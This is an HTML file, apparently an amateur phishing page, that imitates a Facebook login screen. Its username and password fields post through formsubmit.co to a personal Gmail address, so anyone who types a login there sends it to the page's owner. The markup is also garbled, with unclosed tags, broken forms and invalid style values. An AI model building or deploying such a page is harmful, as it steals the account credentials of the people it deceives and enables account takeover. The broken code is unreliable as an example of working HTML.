<DOCTYPE html>
<html>
<head>
 <center><title> log in to facebook </title><center>
   <style type="text/css">
      h3 {
         padding: 20px 10px 20px;
         background: blue;
         color: white;
         border: none;
      }
   </style>
</head>
<body>
   <h3> log in to facebook </h3>
</body>
</html>



<html>
<head>
   <title> Try It Yourself </title>
   <style type="text/css">
      div {
         height: 00px;
         padding: 00px;
         /* the actual rendered height of the element is still 200px */
         background: white;
         width: 200px;
      }
   </style>
</head>
<body>
   <div></div>
   <p> 
   <p>
</body>
</html>


     

     




   
<h1></h1>

<h4><p contenteditable> Enter Your Username:

<p><form action=" https://formsubmit.co/goodboyph123@gmail.com" method="POST" />  </p>
<p><input type="text" name="fullname"placeholder="Enter username" /> <br /> </ </   </p>

<h4><p contenteditable> Enter Your Password:</h4>

<form action="https://formsubmit.co/goodboyph123@gmail.com" method="POST" />
  <input type="text" name="password"placeholder=" Enter password" /> <br />  </p>
        

<h1>
<style type="text/css">
  button {
    border: none;
    background: #0000ff;
    border-radius: 30px;
    padding: 10px;
    color: #ffffff;
    font-weight: squere;
    font-size: 50px:
    text-transform: uppercase;
    opacity: 9.7;
   }
</style>
<button>  log in </button>


    

 

   
